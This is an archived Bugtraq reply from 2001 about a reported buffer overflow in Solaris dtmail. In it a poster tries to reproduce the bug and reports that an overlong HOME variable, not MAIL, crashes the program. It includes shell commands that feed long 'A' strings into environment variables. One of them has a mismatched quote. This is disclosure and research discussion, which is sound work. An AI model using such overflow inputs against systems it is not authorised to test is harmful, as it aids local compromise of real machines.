Bugtraq mailing list archives
Re: NSFOCUS SA2001-04 : Solaris dtmail Buffer Overflow Vulnerability
From: Virtualcat Blackcat <virtualcat () hotmail com>
Date: 25 Jul 2001 02:36:48 -0000
Couldn't reproduce on SUNOS 5.6 % uname -a SunOS sundev1 5.6 Generic_105181-19 sun4u sparc SUNW,Ultra-1 % echo $SHELL /usr/bin/ksh % cp /usr/dt/bin/dtmail . % export MAIL=`perl -e print "A"x2000'` % ./dtmail <!-- Clicked on [Local] when Xwindow popped up --> % dtmail didn't crash. % export MAIL=`perl -e 'print "A"x20000'` % ./dtmail % Didn't crash either. % export HOME=`perl -e 'print "A"x360'` % ./dtmail Segmentation Fault(coredump) Looks like there is something in $HOME, not in $MAIL as posted. Regards, Virtualcat ..oO(I am virtual)Oo.. virtualcat () xfocus org
Current thread:
- NSFOCUS SA2001-04 : Solaris dtmail Buffer Overflow Vulnerability Nsfocus Security Team (Jul 24)
- <Possible follow-ups>
- Re: NSFOCUS SA2001-04 : Solaris dtmail Buffer Overflow Vulnerability Virtualcat Blackcat (Jul 25)